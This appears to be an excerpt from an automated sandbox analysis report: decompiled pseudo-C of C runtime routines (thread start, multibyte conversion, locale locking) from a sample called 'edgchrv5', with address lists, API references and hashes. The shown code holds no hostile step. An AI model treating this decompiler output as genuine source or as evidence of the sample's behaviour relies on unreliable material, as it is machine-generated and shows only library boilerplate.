                                                                                                				_t74 = _v24;
                                                                                                				E01003CB3(_v28);
                                                                                                				asm("int3");
                                                                                                				_t71 = _t74;
                                                                                                				_push(_t67);
                                                                                                				E0100337A();
                                                                                                				_t30 = E0100335A(E01003374());
                                                                                                				if(_t30 != 0) {
                                                                                                					_t54 = _a4;
                                                                                                					 *((intOrPtr*)(_t30 + 0x54)) =  *((intOrPtr*)(_t54 + 0x54));
                                                                                                					 *((intOrPtr*)(_t30 + 0x58)) =  *((intOrPtr*)(_t54 + 0x58));
                                                                                                					_t61 =  *((intOrPtr*)(_t54 + 4));
                                                                                                					_push(_t54);
                                                                                                					 *((intOrPtr*)(_t30 + 4)) = _t61;
                                                                                                					E01003582(_t51, __edi, _t67, __eflags);
                                                                                                				} else {
                                                                                                					_t67 = _a4;
                                                                                                					if(E010033AE(E01003374(), _t67) == 0) {
                                                                                                						ExitThread(GetLastError());
                                                                                                					}
                                                                                                					 *_t67 = GetCurrentThreadId();
                                                                                                				}
                                                                                                				_t79 =  *0x101e424;
                                                                                                				if( *0x101e424 != 0) {
                                                                                                					_t45 = E01003940(_t79, 0x101e424);
                                                                                                					_pop(_t54);
                                                                                                					_t80 = _t45;
                                                                                                					if(_t45 != 0) {
                                                                                                						 *0x101e424(); // executed
                                                                                                					}
                                                                                                				}
                                                                                                				E01002C29(_t61, _t64, _t67, _t80); // executed
                                                                                                				asm("int3");
                                                                                                				_push(_t71);
                                                                                                				_push(_t54);
                                                                                                				_push(_t51);
                                                                                                				_push(_t64);
                                                                                                				_t65 = _v4;
                                                                                                				_v24 = 0;
                                                                                                				_t81 = _t65;
                                                                                                				if(_t65 != 0) {
                                                                                                					_push(_t67);
                                                                                                					E0100337A();
                                                                                                					_t68 = E010041EA(1, 0x214);
                                                                                                					__eflags = _t68;
                                                                                                					if(__eflags == 0) {
                                                                                                						L18:
                                                                                                						_push(_t68);
                                                                                                						E01004117(0, _t65, _t68, __eflags);
                                                                                                						__eflags = _v12;
                                                                                                						if(_v12 != 0) {
                                                                                                							E010040F4(_v12);
                                                                                                						}
                                                                                                						_t36 = 0;
                                                                                                						__eflags = 0;
                                                                                                					} else {
                                                                                                						_push( *((intOrPtr*)(E01003568(0, _t61, _t65, __eflags) + 0x6c)));
                                                                                                						_push(_t68);
                                                                                                						E01003408(0, _t65, _t68, __eflags);
                                                                                                						 *(_t68 + 4) =  *(_t68 + 4) | 0xffffffff;
                                                                                                						 *((intOrPtr*)(_t68 + 0x58)) = _a12;
                                                                                                						_t41 = _a20;
                                                                                                						 *((intOrPtr*)(_t68 + 0x54)) = _t65;
                                                                                                						__eflags = _t41;
                                                                                                						if(_t41 == 0) {
                                                                                                							_t41 =  &_a8;
                                                                                                						}
                                                                                                						_t36 = CreateThread(_v0, _a4, E01002C6A, _t68, _a16, _t41); // executed
                                                                                                						__eflags = _t36;
                                                                                                						if(__eflags == 0) {
                                                                                                							_v12 = GetLastError();
                                                                                                							goto L18;
                                                                                                						}
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t43 = E010040CE(_t81);
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					 *_t43 = 0x16;
                                                                                                					E010043BB(_t61, _t65, _t67);
                                                                                                					_t36 = 0;
                                                                                                				}
                                                                                                				return _t36;
                                                                                                			}
























                                                                                                0x01002c5e
                                                                                                0x01002c5e
                                                                                                0x01002c5e
                                                                                                0x01002c64
                                                                                                0x01002c69
                                                                                                0x01002c6d
                                                                                                0x01002c6f
                                                                                                0x01002c70
                                                                                                0x01002c7b
                                                                                                0x01002c82
                                                                                                0x01002cae
                                                                                                0x01002cb4
                                                                                                0x01002cba
                                                                                                0x01002cbd
                                                                                                0x01002cc0
                                                                                                0x01002cc1
                                                                                                0x01002cc4
                                                                                                0x01002c84
                                                                                                0x01002c84
                                                                                                0x01002c95
                                                                                                0x01002c9e
                                                                                                0x01002c9e
                                                                                                0x01002caa
                                                                                                0x01002caa
                                                                                                0x01002cc9
                                                                                                0x01002cd0
                                                                                                0x01002cd7
                                                                                                0x01002cdc
                                                                                                0x01002cdd
                                                                                                0x01002cdf
                                                                                                0x01002ce1
                                                                                                0x01002ce1
                                                                                                0x01002cdf
                                                                                                0x01002ce7
                                                                                                0x01002cec
                                                                                                0x01002cef
                                                                                                0x01002cf2
                                                                                                0x01002cf3
                                                                                                0x01002cf4
                                                                                                0x01002cf5
                                                                                                0x01002cfa
                                                                                                0x01002cfd
                                                                                                0x01002cff
                                                                                                0x01002d1d
                                                                                                0x01002d1e
                                                                                                0x01002d2f
                                                                                                0x01002d33
                                                                                                0x01002d35
                                                                                                0x01002d81
                                                                                                0x01002d81
                                                                                                0x01002d82
                                                                                                0x01002d88
                                                                                                0x01002d8b
                                                                                                0x01002d90
                                                                                                0x01002d95
                                                                                                0x01002d96
                                                                                                0x01002d96
                                                                                                0x01002d37
                                                                                                0x01002d3c
                                                                                                0x01002d3f
                                                                                                0x01002d40
                                                                                                0x01002d48
                                                                                                0x01002d4c
                                                                                                0x01002d4f
                                                                                                0x01002d54
                                                                                                0x01002d57
                                                                                                0x01002d59
                                                                                                0x01002d5b
                                                                                                0x01002d5b
                                                                                                0x01002d6e
                                                                                                0x01002d74
                                                                                                0x01002d76
                                                                                                0x01002d7e
                                                                                                0x00000000
                                                                                                0x01002d7e
                                                                                                0x01002d76
                                                                                                0x01002d01
                                                                                                0x01002d01
                                                                                                0x01002d06
                                                                                                0x01002d07
                                                                                                0x01002d08
                                                                                                0x01002d09
                                                                                                0x01002d0a
                                                                                                0x01002d0b
                                                                                                0x01002d11
                                                                                                0x01002d19
                                                                                                0x01002d19
                                                                                                0x01002d9c

                                                                                                APIs
                                                                                                  • Part of subcall function 01003CB3: _doexit.LIBCMT ref: 01003CBF
                                                                                                • ___set_flsgetvalue.LIBCMT ref: 01002C70
                                                                                                  • Part of subcall function 0100337A: TlsGetValue.KERNEL32(?,01002C75), ref: 01003383
                                                                                                  • Part of subcall function 0100337A: __decode_pointer.LIBCMT ref: 01003395
                                                                                                  • Part of subcall function 0100337A: TlsSetValue.KERNEL32(00000000,01002C75), ref: 010033A4
                                                                                                • ___fls_getvalue@4.LIBCMT ref: 01002C7B
                                                                                                  • Part of subcall function 0100335A: TlsGetValue.KERNEL32(?,?,01002C80,00000000), ref: 01003368
                                                                                                • ___fls_setvalue@8.LIBCMT ref: 01002C8E
                                                                                                  • Part of subcall function 010033AE: __decode_pointer.LIBCMT ref: 010033BF
                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 01002C97
                                                                                                • ExitThread.KERNEL32 ref: 01002C9E
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 01002CA4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: Value$Thread__decode_pointer$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue_doexit
                                                                                                • String ID:
                                                                                                • API String ID: 1018078644-0
                                                                                                • Opcode ID: 456ceaba663d4e0a0587c9aca1bdd5a5e55d82b7351a2a1e64917b36461f8ed6
                                                                                                • Instruction ID: e1de4ac237611fcb699375aa2d14ea0874ca2362bb3f9d0ac4aef78e9dc15e03
                                                                                                • Opcode Fuzzy Hash: 456ceaba663d4e0a0587c9aca1bdd5a5e55d82b7351a2a1e64917b36461f8ed6
                                                                                                • Instruction Fuzzy Hash: 96E04F7580060A6FFB2337F2894C8DE776C7E21244F108150B9C09B284DE28940187A3
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E01008ACB(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                				char _v8;
                                                                                                				signed int _v12;
                                                                                                				char _v20;
                                                                                                				char _t43;
                                                                                                				char _t46;
                                                                                                				signed int _t53;
                                                                                                				signed int _t54;
                                                                                                				intOrPtr _t56;
                                                                                                				int _t57;
                                                                                                				int _t58;
                                                                                                				signed short* _t59;
                                                                                                				short* _t60;
                                                                                                				int _t65;
                                                                                                				char* _t72;
                                                                                                
                                                                                                				_t72 = _a8;
                                                                                                				if(_t72 == 0 || _a12 == 0) {
                                                                                                					L5:
                                                                                                					return 0;
                                                                                                				} else {
                                                                                                					if( *_t72 != 0) {
                                                                                                						E01004545( &_v20, _a16);
                                                                                                						_t43 = _v20;
                                                                                                						__eflags =  *(_t43 + 0x14);
                                                                                                						if( *(_t43 + 0x14) != 0) {
                                                                                                							_t46 = E01008BFC( *_t72 & 0x000000ff,  &_v20);
                                                                                                							__eflags = _t46;
                                                                                                							if(_t46 == 0) {
                                                                                                								__eflags = _a4;
                                                                                                								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                                								if(__eflags != 0) {
                                                                                                									L10:
                                                                                                									__eflags = _v8;
                                                                                                									if(_v8 != 0) {
                                                                                                										_t53 = _v12;
                                                                                                										_t11 = _t53 + 0x70;
                                                                                                										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                                                										__eflags =  *_t11;
                                                                                                									}
                                                                                                									return 1;
                                                                                                								}
                                                                                                								L21:
                                                                                                								_t54 = E010040CE(__eflags);
                                                                                                								 *_t54 = 0x2a;
                                                                                                								__eflags = _v8;
                                                                                                								if(_v8 != 0) {
                                                                                                									_t54 = _v12;
                                                                                                									_t33 = _t54 + 0x70;
                                                                                                									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                									__eflags =  *_t33;
                                                                                                								}
                                                                                                								return _t54 | 0xffffffff;
                                                                                                							}
                                                                                                							_t56 = _v20;
                                                                                                							_t65 =  *(_t56 + 0xac);
                                                                                                							__eflags = _t65 - 1;
                                                                                                							if(_t65 <= 1) {
                                                                                                								L17:
                                                                                                								__eflags = _a12 -  *(_t56 + 0xac);
                                                                                                								if(__eflags < 0) {
                                                                                                									goto L21;
                                                                                                								}
                                                                                                								__eflags = _t72[1];
                                                                                                								if(__eflags == 0) {
                                                                                                									goto L21;
                                                                                                								}
                                                                                                								L19:
                                                                                                								_t57 =  *(_t56 + 0xac);
                                                                                                								__eflags = _v8;
                                                                                                								if(_v8 == 0) {
                                                                                                									return _t57;
                                                                                                								}
                                                                                                								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                                								return _t57;
                                                                                                							}
                                                                                                							__eflags = _a12 - _t65;
                                                                                                							if(_a12 < _t65) {
                                                                                                								goto L17;
                                                                                                							}
                                                                                                							__eflags = _a4;
                                                                                                							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                                							__eflags = _t58;
                                                                                                							_t56 = _v20;
                                                                                                							if(_t58 != 0) {
                                                                                                								goto L19;
                                                                                                							}
                                                                                                							goto L17;
                                                                                                						}
                                                                                                						_t59 = _a4;
                                                                                                						__eflags = _t59;
                                                                                                						if(_t59 != 0) {
                                                                                                							 *_t59 =  *_t72 & 0x000000ff;
                                                                                                						}
                                                                                                						goto L10;
                                                                                                					} else {
                                                                                                						_t60 = _a4;
                                                                                                						if(_t60 != 0) {
                                                                                                							 *_t60 = 0;
                                                                                                						}
                                                                                                						goto L5;
                                                                                                					}
                                                                                                				}
                                                                                                			}

















                                                                                                0x01008ad5
                                                                                                0x01008adc
                                                                                                0x01008af3
                                                                                                0x00000000
                                                                                                0x01008ae3
                                                                                                0x01008ae5
                                                                                                0x01008aff
                                                                                                0x01008b04
                                                                                                0x01008b07
                                                                                                0x01008b0a
                                                                                                0x01008b33
                                                                                                0x01008b3a
                                                                                                0x01008b3c
                                                                                                0x01008bbd
                                                                                                0x01008bd8
                                                                                                0x01008bda
                                                                                                0x01008b1a
                                                                                                0x01008b1a
                                                                                                0x01008b1d
                                                                                                0x01008b1f
                                                                                                0x01008b22
                                                                                                0x01008b22
                                                                                                0x01008b22
                                                                                                0x01008b22
                                                                                                0x00000000
                                                                                                0x01008b28
                                                                                                0x01008b9c
                                                                                                0x01008b9c
                                                                                                0x01008ba1
                                                                                                0x01008ba7
                                                                                                0x01008baa
                                                                                                0x01008bac
                                                                                                0x01008baf
                                                                                                0x01008baf
                                                                                                0x01008baf
                                                                                                0x01008baf
                                                                                                0x00000000
                                                                                                0x01008bb3
                                                                                                0x01008b3e
                                                                                                0x01008b41
                                                                                                0x01008b47
                                                                                                0x01008b4a
                                                                                                0x01008b71
                                                                                                0x01008b74
                                                                                                0x01008b7a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01008b7c
                                                                                                0x01008b7f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01008b81
                                                                                                0x01008b81
                                                                                                0x01008b87
                                                                                                0x01008b8a
                                                                                                0x01008af8
                                                                                                0x01008af8
                                                                                                0x01008b93
                                                                                                0x00000000
                                                                                                0x01008b93
                                                                                                0x01008b4c
                                                                                                0x01008b4f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01008b53
                                                                                                0x01008b64
                                                                                                0x01008b6a
                                                                                                0x01008b6c
                                                                                                0x01008b6f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01008b6f
                                                                                                0x01008b0c
                                                                                                0x01008b0f
                                                                                                0x01008b11
                                                                                                0x01008b17
                                                                                                0x01008b17
                                                                                                0x00000000
                                                                                                0x01008ae7
                                                                                                0x01008ae7
                                                                                                0x01008aec
                                                                                                0x01008af0
                                                                                                0x01008af0
                                                                                                0x00000000
                                                                                                0x01008aec
                                                                                                0x01008ae5

                                                                                                APIs
                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 01008AFF
                                                                                                • __isleadbyte_l.LIBCMT ref: 01008B33
                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,01002E58,?,00000000,00000000,?,?,?,?,01002E58,00000000,?), ref: 01008B64
                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,01002E58,00000001,00000000,00000000,?,?,?,?,01002E58,00000000,?), ref: 01008BD2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                • String ID:
                                                                                                • API String ID: 3058430110-0
                                                                                                • Opcode ID: b8bc5d92b380e38dde5faf07007f225935394ebe0dee1ef7897850f078e4c460
                                                                                                • Instruction ID: 051f87cd89c697b53337de1c03e47b5e8fe33228b13ed604bc05d6509f6e9e0e
                                                                                                • Opcode Fuzzy Hash: b8bc5d92b380e38dde5faf07007f225935394ebe0dee1ef7897850f078e4c460
                                                                                                • Instruction Fuzzy Hash: C931A271D00256EFFB22DFA8C8909AD3FE4BF02210F05C5AAE6919B1D1D7709980CB54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 90%
                                                                                                			E01005F94(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                                				signed int _t13;
                                                                                                				intOrPtr _t28;
                                                                                                				void* _t29;
                                                                                                				void* _t30;
                                                                                                
                                                                                                				_t30 = __eflags;
                                                                                                				_t26 = __edi;
                                                                                                				_t25 = __edx;
                                                                                                				_t22 = __ebx;
                                                                                                				_push(0xc);
                                                                                                				_push(0x100d578);
                                                                                                				E01003E98(__ebx, __edi, __esi);
                                                                                                				_t28 = E01003568(__ebx, __edx, __edi, _t30);
                                                                                                				_t13 =  *0x100ec80; // 0xfffffffe
                                                                                                				if(( *(_t28 + 0x70) & _t13) == 0) {
                                                                                                					L6:
                                                                                                					E01005CB2(_t22, 0xc);
                                                                                                					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                                                                					_t8 = _t28 + 0x6c; // 0x6c
                                                                                                					_t26 =  *0x100e4a0; // 0x100e3c8
                                                                                                					 *((intOrPtr*)(_t29 - 0x1c)) = E01005F56(_t8, _t26);
                                                                                                					 *(_t29 - 4) = 0xfffffffe;
                                                                                                					E01005FFE();
                                                                                                				} else {
                                                                                                					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                                                					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                                                						goto L6;
                                                                                                					} else {
                                                                                                						_t28 =  *((intOrPtr*)(E01003568(_t22, __edx, _t26, _t32) + 0x6c));
                                                                                                					}
                                                                                                				}
                                                                                                				if(_t28 == 0) {
                                                                                                					E01003A2D(_t25, _t26, 0x20);
                                                                                                				}
                                                                                                				return E01003EDD(_t28);
                                                                                                			}







                                                                                                0x01005f94
                                                                                                0x01005f94
                                                                                                0x01005f94
                                                                                                0x01005f94
                                                                                                0x01005f94
                                                                                                0x01005f96
                                                                                                0x01005f9b
                                                                                                0x01005fa5
                                                                                                0x01005fa7
                                                                                                0x01005faf
                                                                                                0x01005fd3
                                                                                                0x01005fd5
                                                                                                0x01005fdb
                                                                                                0x01005fdf
                                                                                                0x01005fe2
                                                                                                0x01005fed
                                                                                                0x01005ff0
                                                                                                0x01005ff7
                                                                                                0x01005fb1
                                                                                                0x01005fb1
                                                                                                0x01005fb5
                                                                                                0x00000000
                                                                                                0x01005fb7
                                                                                                0x01005fbc
                                                                                                0x01005fbc
                                                                                                0x01005fb5
                                                                                                0x01005fc1
                                                                                                0x01005fc5
                                                                                                0x01005fca
                                                                                                0x01005fd2

                                                                                                APIs
                                                                                                • __getptd.LIBCMT ref: 01005FA0
                                                                                                  • Part of subcall function 01003568: __getptd_noexit.LIBCMT ref: 0100356B
                                                                                                  • Part of subcall function 01003568: __amsg_exit.LIBCMT ref: 01003578
                                                                                                • __getptd.LIBCMT ref: 01005FB7
                                                                                                • __amsg_exit.LIBCMT ref: 01005FC5
                                                                                                • __lock.LIBCMT ref: 01005FD5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                • String ID:
                                                                                                • API String ID: 3521780317-0
                                                                                                • Opcode ID: 1c321928524c053764ed85686390b48f80b1368a878cf65cc74dd95c8a8b7c6a
                                                                                                • Instruction ID: 151ee19a6e78b8a114b7cd5b085157af1828794b5f92718b4961eff99a25762c
                                                                                                • Opcode Fuzzy Hash: 1c321928524c053764ed85686390b48f80b1368a878cf65cc74dd95c8a8b7c6a
                                                                                                • Instruction Fuzzy Hash: 82F090329407069FF763FB688D06BAD76A0BF10720F904A5DD5D0AB2D0CB389801CF62
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%